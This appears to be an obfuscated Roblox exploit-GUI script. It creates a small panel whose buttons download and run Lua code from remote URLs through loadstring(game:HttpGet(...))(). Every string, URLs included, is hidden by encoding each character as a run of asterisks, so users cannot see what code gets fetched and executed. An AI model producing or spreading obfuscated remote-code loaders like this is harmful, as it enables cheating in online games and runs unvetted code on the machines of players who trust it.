function uNeqyijJdzUbYJVyG(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


-- Gui to Lua
-- Version: 3.2

-- Instances:

local ScreenGui = Instance.new(uNeqyijJdzUbYJVyG({'***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************'}))
local Frame = Instance.new(uNeqyijJdzUbYJVyG({'**********************************************************************','******************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************','*****************************************************************************************************'}))
local TextButton = Instance.new(uNeqyijJdzUbYJVyG({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','******************************************************************','*********************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************'}))
local TextButton_2 = Instance.new(uNeqyijJdzUbYJVyG({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','******************************************************************','*********************************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************'}))
local TextLabel = Instance.new(uNeqyijJdzUbYJVyG({'************************************************************************************','*****************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************','****************************************************************************','*************************************************************************************************','**************************************************************************************************','*****************************************************************************************************','************************************************************************************************************'}))

--Properties:

ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild(uNeqyijJdzUbYJVyG({'********************************************************************************','************************************************************************************************************','*************************************************************************************************','*************************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***********************************************************************','*********************************************************************************************************************','*********************************************************************************************************'}))
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
ScreenGui.ResetOnSpawn = false

Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(10, 116, 0)
Frame.BorderColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.332705647, 0, 0.389471442, 0)
Frame.Size = UDim2.new(0, 454, 0, 176)
Frame.Active = true
Frame.Draggable = true

TextButton.Parent = Frame
TextButton.BackgroundColor3 = Color3.fromRGB(12, 176, 0)
TextButton.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.519333482, 0, 0.332977295, 0)
TextButton.Size = UDim2.new(0, 198, 0, 58)
TextButton.Font = Enum.Font.SourceSansSemibold
TextButton.Text = uNeqyijJdzUbYJVyG({'**********************************************************************','*************************************************************************','*****************************************************************','***********************************************************************************','********************************','***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*******************************************************************************************************************'})
TextButton.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton.TextSize = 14.000
TextButton.MouseButton1Down:connect(function()
	loadstring(game:HttpGet(uNeqyijJdzUbYJVyG({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','********************************************************************','*****************************************************************************************************','****************************************************************************************************************','************************************************************************','*********************************************************************************************************************','**************************************************************************************************','************************************************************************','***************************************************************************************************************','************************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***********************************************','********************************************************************','*****************************************************************************************************','****************************************************************************************************************','************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','****************************************************************************','***************************************************************************************************************','*************************************************************************************************','****************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','*************************************************'})))()
	loadstring(game:HttpGet(uNeqyijJdzUbYJVyG({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','************************************************************************','**************************************************','************************************************','*******************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************','************************************************************************************','***********************************************','***********************************************************************************','*************************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************','******************************************************************','******************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*******************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************'})))()
end)

TextButton_2.Parent = Frame
TextButton_2.BackgroundColor3 = Color3.fromRGB(12, 176, 0)
TextButton_2.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.BorderSizePixel = 0
TextButton_2.Position = UDim2.new(0.0457652099, 0, 0.331724167, 0)
TextButton_2.Size = UDim2.new(0, 198, 0, 58)
TextButton_2.Font = Enum.Font.SourceSansSemibold
TextButton_2.Text = uNeqyijJdzUbYJVyG({'*****************************************************************************','*********************************************************************************************************','***************************************************************************************************','********************************','*************************************************************************************','****************************************************************************************************************','********************************','***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*******************************************************************************************************************'})
TextButton_2.TextColor3 = Color3.fromRGB(0, 0, 0)
TextButton_2.TextSize = 14.000
TextButton_2.MouseButton1Down:connect(function()
	game.Workspace.Baseplate.Size = Vector3.new(2048, 16, 2048)
	loadstring(game:HttpGet(uNeqyijJdzUbYJVyG({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','************************************************************************','**************************************************','************************************************','*******************************************************************','*************************************************************************************************','************************************************************************************************************','*********************************************************************************************************','**************************************************************************************************','******************************************************************************************************************','*****************************************************************************************************','*****************************************************************************************','************************************************************************************','***********************************************','***********************************************************************************','*************************************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','*************************************************************************************************************','******************************************************************','******************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','*******************************************************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************'})))()
	loadstring(game:HttpGet(uNeqyijJdzUbYJVyG({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','**********************************************','*******************************************************************************************************','*********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************','*********************************************************************************************************************','**************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*****************************************************************************************************','******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************************','********************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','************************************************','******************************************************************','*****************************************************************************************************','**************************************************************************************************************','*************************************************','***********************************************','******************************************************************************************************','*****************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','***********************************************','***************************************************************************************************************','**************************************************************************************************','******************************************************************************************************','***********************************************************************************************','*************************************************','*************************************************','************************************************************************************************************','*******************************************************','*****************************************************************************************','*************************************************','***************************************************','*************************************************','*****************************************************************************************','*****************************************************************************************************************','**************************************************************************','**********************************************************************************************************','******************************************************************************************','***************************************************','*************************************************','*********************************************************************************','*************************************************************************************************************','**************************************************************************************','*****************************************************','****************************************************************************','********************************************************','****************************************************************************************************************','*************************************************************************','**************************************************','***************************************************','**************************************************************************************','************************************************','**************************************************','**************************************************************************************************','***************************************************','*************************************************','*********************************************************','*************************************************','*******************************************************************************************************************','*********************************************************************','*******************************************************************************************************','**************************************************','******************************************************','*********************************************************************','*******************************************************','*****************************************************','****************************************************','*******************************************************','**************************************************','***************************************************************************************','************************************************************************************************************','*******************************************************','********************************************************','**************************************************************************************','*********************************************************************************************************','********************************************************','********************************************************','*******************************************************','************************************************','**********************************************************************************************************','**********************************************************************************','**********************************************************************************************************************','*****************************************************','********************************************************************************************************************','************************************************************************************************************************','******************************************************************************************','*************************************************************************************************************************','****************************************************************************','*************************************************','**********************************************','************************************************************************************************************','*********************************************************************************************************************','*************************************************************************************************','**********************************************','********************************************************************************************************************','************************************************************************************************************************','********************************************************************************************************************'})))()
	loadstring(game:HttpGet(uNeqyijJdzUbYJVyG({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************************','*************************************************************************************************','*******************************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','*********************************************************************************************************','**************************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','******************************************************************************************************************','*************************************************************************************************','***********************************************************************************************************************','***********************************************','************************************************************************************','****************************************************','**********************************************************************','*********************************************************************','*************************************************************************************************************************','**********************************************************************************************************************','************************************************************************','************************************************************************'})))()
end)

TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(12, 176, 0)
TextLabel.BorderColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0.380868375, 0, 0.0863865912, 0)
TextLabel.Size = UDim2.new(0, 109, 0, 34)
TextLabel.Font = Enum.Font.SourceSansSemibold
TextLabel.Text = uNeqyijJdzUbYJVyG({'******************************************************************','****************************************************************************************************','***************************************************************************************************************','********************************************************************************************************************','*******************************************************************************************************************','********************************','***********************************************************************************','***************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','****************************************************************************************************************','********************************************************************************************************************','*********************************************','***********************************************************************','*************************************************************************************************','********************************************************************************************************************','*****************************************************************************************************'})
TextLabel.TextColor3 = Color3.fromRGB(0, 0, 0)
TextLabel.TextSize = 14.000    
